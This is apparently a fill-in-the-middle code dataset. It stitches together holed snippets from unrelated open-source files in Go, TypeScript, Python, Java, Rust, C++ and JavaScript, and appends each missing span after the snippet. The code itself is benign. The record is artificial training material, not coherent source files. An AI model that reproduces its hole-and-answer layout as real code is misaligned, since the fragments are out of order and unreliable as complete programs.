metadata.NetworkConfig.Interfaces["eth"+deviceNumber] = network } } } return metadata, nil } func (ms MetadataService) Type() string { return "ec2-metadata-service" } func (ms MetadataService) fetchAttributes(key string) ([]string, error) { url := ms.MetadataURL() + key resp, err := ms.FetchData(url) if err != nil { return nil, err } scanner := bufio.NewScanner(bytes.NewBuffer(resp)) data := make([]string, 0) for scanner.Scan() { data = append(data, scanner.Text()) }<|fim▁hole|> func (ms MetadataService) fetchAttribute(key string) (string, error) { attrs, err := ms.fetchAttributes(key) if err == nil && len(attrs) > 0 { return attrs[0], nil } return "", err }<|fim▁end|>
return data, scanner.Err() }
<|file_name|>definitions.ts<|end_file_name|><|fim▁begin|>/** * @license * Copyright Google LLC All Rights Reserved. * * Use of this source code is governed by an MIT-style license that can be * found in the LICENSE file at https://angular.io/license */ import {AST, TmplAstBoundAttribute, TmplAstBoundEvent, TmplAstElement, TmplAstNode, TmplAstTemplate, TmplAstTextAttribute} from '@angular/compiler'; import {NgCompiler} from '@angular/compiler-cli/src/ngtsc/core'; import {isExternalResource} from '@angular/compiler-cli/src/ngtsc/metadata'; import {DirectiveSymbol, DomBindingSymbol, ElementSymbol, ShimLocation, Symbol, SymbolKind, TemplateSymbol} from '@angular/compiler-cli/src/ngtsc/typecheck/api'; import * as ts from 'typescript'; import {getTargetAtPosition, TargetNodeKind} from './template_target'; import {findTightestNode, getParentClassDeclaration} from './ts_utils'; import {flatMap, getDirectiveMatchesForAttribute, getDirectiveMatchesForElementTag, getTemplateInfoAtPosition, getTextSpanOfNode, isDollarEvent, isTypeScriptFile, TemplateInfo, toTextSpan} from './utils'; interface DefinitionMeta { node: AST|TmplAstNode; parent: AST|TmplAstNode|null; symbol: Symbol; } interface HasShimLocation { shimLocation: ShimLocation; } export class DefinitionBuilder { constructor(private readonly tsLS: ts.LanguageService, private readonly compiler: NgCompiler) {} getDefinitionAndBoundSpan(fileName: string, position: number): ts.DefinitionInfoAndBoundSpan |undefined { const templateInfo = getTemplateInfoAtPosition(fileName, position, this.compiler); if (templateInfo === undefined) { // We were unable to get a template at the given position. If we are in a TS file, instead // attempt to get an Angular definition at the location inside a TS file (examples of this // would be templateUrl or a url in styleUrls). if (!isTypeScriptFile(fileName)) { return; } return getDefinitionForExpressionAtPosition(fileName, position, this.compiler); } const definitionMetas = this.getDefinitionMetaAtPosition(templateInfo, position); if (definitionMetas === undefined) { return undefined; } const definitions: ts.DefinitionInfo[] = []; for (const definitionMeta of definitionMetas) { // The `$event` of event handlers would point to the $event parameter in the shim file, as in // `_outputHelper(_t3["x"]).subscribe(function ($event): any { $event }) ;` // If we wanted to return something for this, it would be more appropriate for something like // `getTypeDefinition`. if (isDollarEvent(definitionMeta.node)) { continue; } definitions.push( ...(this.getDefinitionsForSymbol({...definitionMeta, ...templateInfo}) ?? [])); } if (definitions.length === 0) { return undefined; } return {definitions, textSpan: getTextSpanOfNode(definitionMetas[0].node)}; } private getDefinitionsForSymbol({symbol, node, parent, component}: DefinitionMeta& TemplateInfo): readonly ts.DefinitionInfo[]|undefined { switch (symbol.kind) { case SymbolKind.Directive: case SymbolKind.Element: case SymbolKind.Template: case SymbolKind.DomBinding: // Though it is generally more appropriate for the above symbol definitions to be // associated with "type definitions" since the location in the template is the // actual definition location, the better user experience would be to allow // LS users to "go to definition" on an item in the template that maps to a class and be // taken to the directive or HTML class. return this.getTypeDefinitionsForTemplateInstance(symbol, node); case SymbolKind.Pipe: { if (symbol.tsSymbol !== null) { return this.getDefinitionsForSymbols(symbol); } else { // If there is no `ts.Symbol` for the pipe transform, we want to return the // type definition (the pipe class). return this.getTypeDefinitionsForSymbols(symbol.classSymbol); } } case SymbolKind.Output: case SymbolKind.Input: { const bindingDefs = this.getDefinitionsForSymbols(...symbol.bindings); // Also attempt to get directive matches for the input name. If there is a directive that // has the input name as part of the selector, we want to return that as well. const directiveDefs = this.getDirectiveTypeDefsForBindingNode(node, parent, component); return [...bindingDefs, ...directiveDefs]; } case SymbolKind.Variable: case SymbolKind.Reference: { const definitions: ts.DefinitionInfo[] = []; if (symbol.declaration !== node) { definitions.push({ name: symbol.declaration.name, containerName: '', containerKind: ts.ScriptElementKind.unknown, kind: ts.ScriptElementKind.variableElement, textSpan: getTextSpanOfNode(symbol.declaration), contextSpan: toTextSpan(symbol.declaration.sourceSpan), fileName: symbol.declaration.sourceSpan.start.file.url, }); } if (symbol.kind === SymbolKind.Variable) { definitions.push( ...this.getDefinitionsForSymbols({shimLocation: symbol.initializerLocation})); } return definitions; } case SymbolKind.Expression: { return this.getDefinitionsForSymbols(symbol); } } } private getDefinitionsForSymbols(...symbols: HasShimLocation[]): ts.DefinitionInfo[] { return flatMap(symbols, ({shimLocation}) => { const {shimPath, positionInShimFile} = shimLocation; return this.tsLS.getDefinitionAtPosition(shimPath, positionInShimFile) ?? []; }); } getTypeDefinitionsAtPosition(fileName: string, position: number): readonly ts.DefinitionInfo[]|undefined { const templateInfo = getTemplateInfoAtPosition(fileName, position, this.compiler); if (templateInfo === undefined) { return; } const definitionMetas = this.getDefinitionMetaAtPosition(templateInfo, position); if (definitionMetas === undefined) { return undefined; } const definitions: ts.DefinitionInfo[] = []; for (const {symbol, node, parent} of definitionMetas) { switch (symbol.kind) { case SymbolKind.Directive: case SymbolKind.DomBinding: case SymbolKind.Element: case SymbolKind.Template: definitions.push(...this.getTypeDefinitionsForTemplateInstance(symbol, node)); break; case SymbolKind.Output: case SymbolKind.Input: { const bindingDefs = this.getTypeDefinitionsForSymbols(...symbol.bindings); definitions.push(...bindingDefs); // Also attempt to get directive matches for the input name. If there is a directive that // has the input name as part of the selector, we want to return that as well. const directiveDefs = this.getDirectiveTypeDefsForBindingNode(node, parent, templateInfo.component); definitions.push(...directiveDefs); break; } case SymbolKind.Pipe: { if (symbol.tsSymbol !== null) { definitions.push(...this.getTypeDefinitionsForSymbols(symbol)); } else { // If there is no `ts.Symbol` for the pipe transform, we want to return the // type definition (the pipe class). definitions.push(...this.getTypeDefinitionsForSymbols(symbol.classSymbol)); } break; } case SymbolKind.Reference: definitions.push( ...this.getTypeDefinitionsForSymbols({shimLocation: symbol.targetLocation}));<|fim▁hole|> case SymbolKind.Variable: { definitions.push( ...this.getTypeDefinitionsForSymbols({shimLocation: symbol.initializerLocation})); break; } } return definitions; } } private getTypeDefinitionsForTemplateInstance( symbol: TemplateSymbol|ElementSymbol|DomBindingSymbol|DirectiveSymbol, node: AST|TmplAstNode): ts.DefinitionInfo[] { switch (symbol.kind) { case SymbolKind.Template: { const matches = getDirectiveMatchesForElementTag(symbol.templateNode, symbol.directives); return this.getTypeDefinitionsForSymbols(...matches); } case SymbolKind.Element: { const matches = getDirectiveMatchesForElementTag(symbol.templateNode, symbol.directives); // If one of the directive matches is a component, we should not include the native element // in the results because it is replaced by the component. return Array.from(matches).some(dir => dir.isComponent) ? this.getTypeDefinitionsForSymbols(...matches) : this.getTypeDefinitionsForSymbols(...matches, symbol); } case SymbolKind.DomBinding: { if (!(node instanceof TmplAstTextAttribute)) { return []; } const dirs = getDirectiveMatchesForAttribute( node.name, symbol.host.templateNode, symbol.host.directives); return this.getTypeDefinitionsForSymbols(...dirs); } case SymbolKind.Directive: return this.getTypeDefinitionsForSymbols(symbol); } } private getDirectiveTypeDefsForBindingNode( node: TmplAstNode|AST, parent: TmplAstNode|AST|null, component: ts.ClassDeclaration) { if (!(node instanceof TmplAstBoundAttribute) && !(node instanceof TmplAstTextAttribute) && !(node instanceof TmplAstBoundEvent)) { return []; } if (parent === null || !(parent instanceof TmplAstTemplate || parent instanceof TmplAstElement)) { return []; } const templateOrElementSymbol = this.compiler.getTemplateTypeChecker().getSymbolOfNode(parent, component); if (templateOrElementSymbol === null || (templateOrElementSymbol.kind !== SymbolKind.Template && templateOrElementSymbol.kind !== SymbolKind.Element)) { return []; } const dirs = getDirectiveMatchesForAttribute(node.name, parent, templateOrElementSymbol.directives); return this.getTypeDefinitionsForSymbols(...dirs); } private getTypeDefinitionsForSymbols(...symbols: HasShimLocation[]): ts.DefinitionInfo[] { return flatMap(symbols, ({shimLocation}) => { const {shimPath, positionInShimFile} = shimLocation; return this.tsLS.getTypeDefinitionAtPosition(shimPath, positionInShimFile) ?? []; }); } private getDefinitionMetaAtPosition({template, component}: TemplateInfo, position: number): DefinitionMeta[]|undefined { const target = getTargetAtPosition(template, position); if (target === null) { return undefined; } const {context, parent} = target; const nodes = context.kind === TargetNodeKind.TwoWayBindingContext ? context.nodes : [context.node]; const definitionMetas: DefinitionMeta[] = []; for (const node of nodes) { const symbol = this.compiler.getTemplateTypeChecker().getSymbolOfNode(node, component); if (symbol === null) { continue; } definitionMetas.push({node, parent, symbol}); } return definitionMetas.length > 0 ? definitionMetas : undefined; } } /** * Gets an Angular-specific definition in a TypeScript source file. */ function getDefinitionForExpressionAtPosition( fileName: string, position: number, compiler: NgCompiler): ts.DefinitionInfoAndBoundSpan| undefined { const sf = compiler.getNextProgram().getSourceFile(fileName); if (sf === undefined) { return; } const expression = findTightestNode(sf, position); if (expression === undefined) { return; } const classDeclaration = getParentClassDeclaration(expression); if (classDeclaration === undefined) { return; } const componentResources = compiler.getComponentResources(classDeclaration); if (componentResources === null) { return; } const allResources = [...componentResources.styles, componentResources.template]; const resourceForExpression = allResources.find(resource => resource.expression === expression); if (resourceForExpression === undefined || !isExternalResource(resourceForExpression)) { return; } const templateDefinitions: ts.DefinitionInfo[] = [{ kind: ts.ScriptElementKind.externalModuleName, name: resourceForExpression.path, containerKind: ts.ScriptElementKind.unknown, containerName: '', // Reading the template is expensive, so don't provide a preview. // TODO(ayazhafiz): Consider providing an actual span: // 1. We're likely to read the template anyway // 2. We could show just the first 100 chars or so textSpan: {start: 0, length: 0}, fileName: resourceForExpression.path, }]; return { definitions: templateDefinitions, textSpan: { // Exclude opening and closing quotes in the url span. start: expression.getStart() + 1, length: expression.getWidth() - 2, }, }; }<|fim▁end|>
break; case SymbolKind.Expression: definitions.push(...this.getTypeDefinitionsForSymbols(symbol)); break;
<|file_name|>actions.py<|end_file_name|><|fim▁begin|># Copyright 2014 - Mirantis, Inc. # Copyright 2015 - StackStorm, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from mistral.lang import types from mistral.lang.v2 import base from mistral_lib import utils class ActionSpec(base.BaseSpec): # See http://json-schema.org _schema = { "type": "object", "properties": { "base": types.NONEMPTY_STRING, "base-input": types.NONEMPTY_DICT, "input": types.UNIQUE_STRING_OR_ONE_KEY_DICT_LIST, "output": types.ANY_NULLABLE, }, "required": ["base"], "additionalProperties": False } def __init__(self, data, validate): super(ActionSpec, self).__init__(data, validate) self._name = data['name'] self._description = data.get('description') self._tags = data.get('tags', []) self._base = data['base'] self._base_input = data.get('base-input', {}) self._input = utils.get_dict_from_entries(data.get('input', [])) self._output = data.get('output') self._base, _input = self._parse_cmd_and_input(self._base) utils.merge_dicts(self._base_input, _input) def validate_schema(self): super(ActionSpec, self).validate_schema() # Validate YAQL expressions. inline_params = self._parse_cmd_and_input(self._data.get('base'))[1] self.validate_expr(inline_params) self.validate_expr(self._data.get('base-input', {})) if isinstance(self._data.get('output'), str): self.validate_expr(self._data.get('output')) def get_name(self): return self._name def get_description(self): return self._description def get_tags(self): return self._tags def get_base(self): return self._base def get_base_input(self): return self._base_input <|fim▁hole|> def get_output(self): return self._output class ActionSpecList(base.BaseSpecList): item_class = ActionSpec class ActionListSpec(base.BaseListSpec): item_class = ActionSpec def get_actions(self): return self.get_items()<|fim▁end|>
def get_input(self): return self._input
<|file_name|>Exporter.java<|end_file_name|><|fim▁begin|>package com.deleidos.dp.export; <|fim▁hole|>import com.deleidos.dp.exceptions.H2DataAccessException; import com.deleidos.dp.exceptions.SchemaNotFoundException; public interface Exporter { public abstract String generateExport(Schema schema); public abstract String generateExport(Schema schema, Schema previousVersion); }<|fim▁end|>
import com.deleidos.dp.beans.Schema;
<|file_name|>process_payment_parameters.go<|end_file_name|><|fim▁begin|>// Code generated by go-swagger; DO NOT EDIT. package account // This file was generated by the swagger tool. // Editing this file might prove futile when you re-run the swagger generate command import ( "context" "net/http" "time" "github.com/go-openapi/errors" "github.com/go-openapi/runtime" cr "github.com/go-openapi/runtime/client" "github.com/go-openapi/swag" strfmt "github.com/go-openapi/strfmt" kbmodel "github.com/killbill/kbcli/v2/kbmodel" ) // NewProcessPaymentParams creates a new ProcessPaymentParams object // with the default values initialized. func NewProcessPaymentParams() *ProcessPaymentParams { var () return &ProcessPaymentParams{ timeout: cr.DefaultTimeout, } } // NewProcessPaymentParamsWithTimeout creates a new ProcessPaymentParams object // with the default values initialized, and the ability to set a timeout on a request func NewProcessPaymentParamsWithTimeout(timeout time.Duration) *ProcessPaymentParams {<|fim▁hole|> return &ProcessPaymentParams{ timeout: timeout, } } // NewProcessPaymentParamsWithContext creates a new ProcessPaymentParams object // with the default values initialized, and the ability to set a context for a request func NewProcessPaymentParamsWithContext(ctx context.Context) *ProcessPaymentParams { var () return &ProcessPaymentParams{ Context: ctx, } } // NewProcessPaymentParamsWithHTTPClient creates a new ProcessPaymentParams object // with the default values initialized, and the ability to set a custom HTTPClient for a request func NewProcessPaymentParamsWithHTTPClient(client *http.Client) *ProcessPaymentParams { var () return &ProcessPaymentParams{ HTTPClient: client, } } /*ProcessPaymentParams contains all the parameters to send to the API endpoint for the process payment operation typically these are written to a http.Request */ type ProcessPaymentParams struct { /*XKillbillComment*/ XKillbillComment *string /*XKillbillCreatedBy*/ XKillbillCreatedBy string /*XKillbillReason*/ XKillbillReason *string /*AccountID*/ AccountID strfmt.UUID /*Body*/ Body *kbmodel.PaymentTransaction /*ControlPluginName*/ ControlPluginName []string /*PaymentMethodID*/ PaymentMethodID *strfmt.UUID /*PluginProperty*/ PluginProperty []string WithProfilingInfo *string // If set, return KB hprof headers WithStackTrace *bool // If set, returns full stack trace with error message timeout time.Duration Context context.Context HTTPClient *http.Client ProcessLocationHeader bool // For create APIs that return 201, send another request and retrieve the resource. } // WithTimeout adds the timeout to the process payment params func (o *ProcessPaymentParams) WithTimeout(timeout time.Duration) *ProcessPaymentParams { o.SetTimeout(timeout) return o } // SetTimeout adds the timeout to the process payment params func (o *ProcessPaymentParams) SetTimeout(timeout time.Duration) { o.timeout = timeout } // WithContext adds the context to the process payment params func (o *ProcessPaymentParams) WithContext(ctx context.Context) *ProcessPaymentParams { o.SetContext(ctx) return o } // SetContext adds the context to the process payment params func (o *ProcessPaymentParams) SetContext(ctx context.Context) { o.Context = ctx } // WithHTTPClient adds the HTTPClient to the process payment params func (o *ProcessPaymentParams) WithHTTPClient(client *http.Client) *ProcessPaymentParams { o.SetHTTPClient(client) return o } // SetHTTPClient adds the HTTPClient to the process payment params func (o *ProcessPaymentParams) SetHTTPClient(client *http.Client) { o.HTTPClient = client } // WithXKillbillComment adds the xKillbillComment to the process payment params func (o *ProcessPaymentParams) WithXKillbillComment(xKillbillComment *string) *ProcessPaymentParams { o.SetXKillbillComment(xKillbillComment) return o } // SetXKillbillComment adds the xKillbillComment to the process payment params func (o *ProcessPaymentParams) SetXKillbillComment(xKillbillComment *string) { o.XKillbillComment = xKillbillComment } // WithXKillbillCreatedBy adds the xKillbillCreatedBy to the process payment params func (o *ProcessPaymentParams) WithXKillbillCreatedBy(xKillbillCreatedBy string) *ProcessPaymentParams { o.SetXKillbillCreatedBy(xKillbillCreatedBy) return o } // SetXKillbillCreatedBy adds the xKillbillCreatedBy to the process payment params func (o *ProcessPaymentParams) SetXKillbillCreatedBy(xKillbillCreatedBy string) { o.XKillbillCreatedBy = xKillbillCreatedBy } // WithXKillbillReason adds the xKillbillReason to the process payment params func (o *ProcessPaymentParams) WithXKillbillReason(xKillbillReason *string) *ProcessPaymentParams { o.SetXKillbillReason(xKillbillReason) return o } // SetXKillbillReason adds the xKillbillReason to the process payment params func (o *ProcessPaymentParams) SetXKillbillReason(xKillbillReason *string) { o.XKillbillReason = xKillbillReason } // WithAccountID adds the accountID to the process payment params func (o *ProcessPaymentParams) WithAccountID(accountID strfmt.UUID) *ProcessPaymentParams { o.SetAccountID(accountID) return o } // SetAccountID adds the accountId to the process payment params func (o *ProcessPaymentParams) SetAccountID(accountID strfmt.UUID) { o.AccountID = accountID } // WithBody adds the body to the process payment params func (o *ProcessPaymentParams) WithBody(body *kbmodel.PaymentTransaction) *ProcessPaymentParams { o.SetBody(body) return o } // SetBody adds the body to the process payment params func (o *ProcessPaymentParams) SetBody(body *kbmodel.PaymentTransaction) { o.Body = body } // WithControlPluginName adds the controlPluginName to the process payment params func (o *ProcessPaymentParams) WithControlPluginName(controlPluginName []string) *ProcessPaymentParams { o.SetControlPluginName(controlPluginName) return o } // SetControlPluginName adds the controlPluginName to the process payment params func (o *ProcessPaymentParams) SetControlPluginName(controlPluginName []string) { o.ControlPluginName = controlPluginName } // WithPaymentMethodID adds the paymentMethodID to the process payment params func (o *ProcessPaymentParams) WithPaymentMethodID(paymentMethodID *strfmt.UUID) *ProcessPaymentParams { o.SetPaymentMethodID(paymentMethodID) return o } // SetPaymentMethodID adds the paymentMethodId to the process payment params func (o *ProcessPaymentParams) SetPaymentMethodID(paymentMethodID *strfmt.UUID) { o.PaymentMethodID = paymentMethodID } // WithPluginProperty adds the pluginProperty to the process payment params func (o *ProcessPaymentParams) WithPluginProperty(pluginProperty []string) *ProcessPaymentParams { o.SetPluginProperty(pluginProperty) return o } // SetPluginProperty adds the pluginProperty to the process payment params func (o *ProcessPaymentParams) SetPluginProperty(pluginProperty []string) { o.PluginProperty = pluginProperty } // WriteToRequest writes these params to a swagger request func (o *ProcessPaymentParams) WriteToRequest(r runtime.ClientRequest, reg strfmt.Registry) error { if err := r.SetTimeout(o.timeout); err != nil { return err } var res []error if o.XKillbillComment != nil { // header param X-Killbill-Comment if err := r.SetHeaderParam("X-Killbill-Comment", *o.XKillbillComment); err != nil { return err } } // header param X-Killbill-CreatedBy if err := r.SetHeaderParam("X-Killbill-CreatedBy", o.XKillbillCreatedBy); err != nil { return err } if o.XKillbillReason != nil { // header param X-Killbill-Reason if err := r.SetHeaderParam("X-Killbill-Reason", *o.XKillbillReason); err != nil { return err } } // path param accountId if err := r.SetPathParam("accountId", o.AccountID.String()); err != nil { return err } if o.Body != nil { if err := r.SetBodyParam(o.Body); err != nil { return err } } valuesControlPluginName := o.ControlPluginName joinedControlPluginName := swag.JoinByFormat(valuesControlPluginName, "multi") // query array param controlPluginName if err := r.SetQueryParam("controlPluginName", joinedControlPluginName...); err != nil { return err } if o.PaymentMethodID != nil { // query param paymentMethodId var qrPaymentMethodID strfmt.UUID if o.PaymentMethodID != nil { qrPaymentMethodID = *o.PaymentMethodID } qPaymentMethodID := qrPaymentMethodID.String() if qPaymentMethodID != "" { if err := r.SetQueryParam("paymentMethodId", qPaymentMethodID); err != nil { return err } } } valuesPluginProperty := o.PluginProperty joinedPluginProperty := swag.JoinByFormat(valuesPluginProperty, "multi") // query array param pluginProperty if err := r.SetQueryParam("pluginProperty", joinedPluginProperty...); err != nil { return err } // header param WithProfilingInfo if o.WithProfilingInfo != nil && len(*o.WithProfilingInfo) > 0 { if err := r.SetHeaderParam("X-Killbill-Profiling-Req", *o.WithProfilingInfo); err != nil { return err } } // header param withStackTrace if o.WithStackTrace != nil && *o.WithStackTrace { if err := r.SetQueryParam("withStackTrace", "true"); err != nil { return err } } if len(res) > 0 { return errors.CompositeValidationError(res...) } return nil }<|fim▁end|>
var ()
<|file_name|>params_parser.js<|end_file_name|><|fim▁begin|>function parse(req) { var arreglo_parametros = [], parametros = {};<|fim▁hole|> var arreglo_parametros = url_data[1].split("&"); } for (var i = arreglo_parametros.length - 1; i >= 0; i--) { var parametro = arreglo_parametros[i] var param_data = parametro.split("="); parametros[param_data[0]] = [param_data[1]]; } return parametros; } module.exports.parse = parse;<|fim▁end|>
if (req.url.indexOf("?") > 0 ){ var url_data = req.url.split("?");
<|file_name|>EmailResponse.java<|end_file_name|><|fim▁begin|>package org.hisp.dhis.email; /* * Copyright (c) 2004-2018, University of Oslo * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * Neither the name of the HISP project nor the names of its contributors may * be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ /** * @author Zubair <[email protected]> */ public enum EmailResponse { SENT( "success" ), FAILED( "failed" ), ABORTED( "aborted" ), NOT_CONFIGURED( "no configuration found" ); private String responseMessage; EmailResponse( String responseMessage ) {<|fim▁hole|> } public String getResponseMessage() { return responseMessage; } public void setResponseMessage( String responseMessage ) { this.responseMessage = responseMessage; } }<|fim▁end|>
this.responseMessage = responseMessage;
<|file_name|>const-param-elided-lifetime.rs<|end_file_name|><|fim▁begin|>// Elided lifetimes within the type of a const generic parameters is disallowed. This matches the // behaviour of trait bounds where `fn foo<T: Ord<&u8>>() {}` is illegal. Though we could change // elided lifetimes within the type of a const generic parameters to be 'static, like elided // lifetimes within const/static items. // revisions: full min #![cfg_attr(full, feature(adt_const_params))] #![cfg_attr(full, allow(incomplete_features))] struct A<const N: &u8>; //~^ ERROR `&` without an explicit lifetime name cannot be used here //[min]~^^ ERROR `&'static u8` is forbidden trait B {} impl<const N: &u8> A<N> { //~^ ERROR `&` without an explicit lifetime name cannot be used here //[min]~^^ ERROR `&'static u8` is forbidden<|fim▁hole|>} impl<const N: &u8> B for A<N> {} //~^ ERROR `&` without an explicit lifetime name cannot be used here //[min]~^^ ERROR `&'static u8` is forbidden fn bar<const N: &u8>() {} //~^ ERROR `&` without an explicit lifetime name cannot be used here //[min]~^^ ERROR `&'static u8` is forbidden fn main() {}<|fim▁end|>
fn foo<const M: &u8>(&self) {} //~^ ERROR `&` without an explicit lifetime name cannot be used here //[min]~^^ ERROR `&'static u8` is forbidden
<|file_name|>File_7z.cpp<|end_file_name|><|fim▁begin|>/* Copyright (c) MediaArea.net SARL. All Rights Reserved. * * Use of this source code is governed by a BSD-style license that can * be found in the License.html file in the root of the source tree. */ //--------------------------------------------------------------------------- // Pre-compilation #include "MediaInfo/PreComp.h" #ifdef __BORLANDC__ #pragma hdrstop #endif //--------------------------------------------------------------------------- //--------------------------------------------------------------------------- #include "MediaInfo/Setup.h" //--------------------------------------------------------------------------- //--------------------------------------------------------------------------- #if defined(MEDIAINFO_7Z_YES) //--------------------------------------------------------------------------- //--------------------------------------------------------------------------- #include "MediaInfo/Archive/File_7z.h" //--------------------------------------------------------------------------- namespace MediaInfoLib { //*************************************************************************** // Buffer - File header //*************************************************************************** //--------------------------------------------------------------------------- bool File_7z::FileHeader_Begin()<|fim▁hole|> // Testing if (Buffer[0]!=0x37 // "7z...." || Buffer[1]!=0x7A || Buffer[2]!=0xBC || Buffer[3]!=0xAF || Buffer[4]!=0x27 || Buffer[5]!=0x1C) { Reject("7-Zip"); return false; } // All should be OK... return true; } //*************************************************************************** // Buffer - Global //*************************************************************************** //--------------------------------------------------------------------------- void File_7z::Read_Buffer_Continue() { Skip_B6( "Magic"); Skip_XX(File_Size-6, "Data"); FILLING_BEGIN(); Accept("7-Zip"); Fill(Stream_General, 0, General_Format, "7-Zip"); Finish("7-Zip"); FILLING_END(); } } //NameSpace #endif //MEDIAINFO_7Z_YES<|fim▁end|>
{ // Minimum buffer size if (Buffer_Size<6) return false; // Must wait for more data
<|file_name|>AdminPrefix_Resourcer_v1.py<|end_file_name|><|fim▁begin|><|fim▁hole|>#Adam Breznicky - TxDOT TPP - Mapping Group # #This is an independent script which requires a single parameter designating a directory. #The script will walk through each subfolder and file within the designated directory, identifying the MXD files #and re-sourcing the Comanche database connections to utilize the new 'Admin' prefix # # # # #import modules import arcpy, os #variables directory = "" def re_source_admin(): #issue list issues = [] #walk through each directory for root, dirs, files in os.walk(directory): #ignore file and personal geodatabases specDir = root.split("\\")[-1] dbsuffix = specDir.split(".")[-1] if dbsuffix == "gdb" or dbsuffix == "mdb" or dbsuffix == "tbx": pass else: for n in files: #identify the mxds if str(n).split(".")[-1] == "mxd": print "working on: " + str(os.path.join(root, n)) map = arcpy.mapping.MapDocument(os.path.join(root, n)) dataframes = arcpy.mapping.ListDataFrames(map) for df in dataframes: layers = arcpy.mapping.ListLayers(map, "", df) for lyr in layers: try: if "TPP_GIS.MCHAMB1." in lyr.dataSource: print "lyr source: " + lyr.dataSource newsource = lyr.dataSource.replace("TPP_GIS.MCHAMB1.", "TPP_GIS.APP_TPP_GIS_ADMIN.") location = newsource.split("\\")[:-2] locationFixed = "\\".join(location) print locationFixed newname = newsource.split("\\")[-1] print newname lyr.replaceDataSource(locationFixed, "SDE_WORKSPACE", newname) print "lyr replaced: " + newsource except: if os.path.join(root, n) not in issues: issues.append(os.path.join(root, n)) print lyr.name + " is not a feature layer" tables = arcpy.mapping.ListTableViews(map, "", df) for tbl in tables: try: if "TPP_GIS.MCHAMB1." in tbl.dataSource: print "tbl source: " + tbl.dataSource newsource = tbl.dataSource.replace("TPP_GIS.MCHAMB1.", "TPP_GIS.APP_TPP_GIS_ADMIN.") location = newsource.split("\\")[:-2] locationFixed = "\\".join(location) print locationFixed newname = newsource.split("\\")[-1] print newname tbl.replaceDataSource(locationFixed, "SDE_WORKSPACE", newname) print "tbl replaced: " + newsource except: if os.path.join(root, n) not in issues: issues.append(os.path.join(root, n)) print tbl.name + " is not a feature layer" map.save() re_source_admin() print "success!" print "the following MXDs contained issues with a layer having not a dataSource (e.g. a non-feature layer):" for i in issues: print str(i)<|fim▁end|>
# # #March 2014
<|file_name|>formatter.rs<|end_file_name|><|fim▁begin|>use ansi_term::Colour::Green; use ansi_term::Colour::Yellow; use app::machine::Machine; fn get_empty_line() -> String { String::from("") } fn get_header() -> String { let o = format!("{0: ^10} | {1: ^10} | {2: ^10} | {3: ^10}",<|fim▁hole|> "State", "Path"); format!("{}", Yellow.paint(o)) } fn get_machine_line(machine: &Machine) -> String { let line = format!("{0: ^10} | {1: ^10} | {2: ^10} | {3: ^10}", machine.get_number(), machine.get_name(), machine.get_state(), machine.get_path()); format!("{}", Green.paint(line)) } fn get_separator() -> String { let s = format!("{0: ^10} | {1: ^10} | {2: ^10} | {3: ^10}", "----------", "----------", "----------", "----------"); format!("{}", Yellow.paint(s)) } pub fn format(machines: &[Machine]) -> String { let mut lines = Vec::new(); lines.push(get_empty_line()); lines.push(get_header()); lines.push(get_separator()); for machine in machines { lines.push(get_machine_line(machine)); } lines.push(get_empty_line()); lines.join("\n") }<|fim▁end|>
"Number", "Name",
<|file_name|>test_sgd.py<|end_file_name|><|fim▁begin|>import pickle import unittest import numpy as np import scipy.sparse as sp from sklearn.utils.testing import assert_array_equal from sklearn.utils.testing import assert_almost_equal from sklearn.utils.testing import assert_array_almost_equal from sklearn.utils.testing import assert_greater from sklearn.utils.testing import assert_less from sklearn.utils.testing import raises from sklearn.utils.testing import assert_raises from sklearn.utils.testing import assert_true from sklearn.utils.testing import assert_equal from sklearn import linear_model, datasets, metrics from sklearn.base import clone from sklearn.linear_model import SGDClassifier, SGDRegressor from sklearn.preprocessing import LabelEncoder, scale class SparseSGDClassifier(SGDClassifier): def fit(self, X, y, *args, **kw): X = sp.csr_matrix(X) return SGDClassifier.fit(self, X, y, *args, **kw) def partial_fit(self, X, y, *args, **kw): X = sp.csr_matrix(X) return SGDClassifier.partial_fit(self, X, y, *args, **kw) def decision_function(self, X, *args, **kw): X = sp.csr_matrix(X) return SGDClassifier.decision_function(self, X, *args, **kw) def predict_proba(self, X, *args, **kw): X = sp.csr_matrix(X) return SGDClassifier.predict_proba(self, X, *args, **kw) def predict_log_proba(self, X, *args, **kw): X = sp.csr_matrix(X) return SGDClassifier.predict_log_proba(self, X, *args, **kw) class SparseSGDRegressor(SGDRegressor): def fit(self, X, y, *args, **kw): X = sp.csr_matrix(X) return SGDRegressor.fit(self, X, y, *args, **kw) def partial_fit(self, X, y, *args, **kw): X = sp.csr_matrix(X) return SGDRegressor.partial_fit(self, X, y, *args, **kw) def decision_function(self, X, *args, **kw): X = sp.csr_matrix(X) return SGDRegressor.decision_function(self, X, *args, **kw) ## ## Test Data ## # test sample 1 X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]) Y = [1, 1, 1, 2, 2, 2] T = np.array([[-1, -1], [2, 